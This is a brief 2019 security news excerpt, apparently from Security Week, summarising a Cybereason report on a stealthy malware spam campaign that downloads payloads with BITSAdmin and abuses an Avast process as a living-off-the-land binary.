Extensive ‘Living Off the Land’ Hides Stealthy Malware Campaign

February 13, 2019

The latest campaign, discovered by the Cybereason Nocturnus Research team, uses an evolved variant of the malware that goes to great lengths to remain stealthy in what is described as a ‘massive spam campaign’. In a blog report published today, Cybereason has noted four major differences from earlier variants.

Firstly, this variant exclusively uses BITSAdmin (as used in the latest-reported APT10 attacks) to download the payload. Earlier versions used Windows’ certificate management tool, certutil.

Secondly, in a major and effective move, the latest version uses rather than evades the Avast anti-malware product. Earlier versions simply stopped if Avast was present. The latest version uses an Avast process as a LOLBin.

Read More on Security Week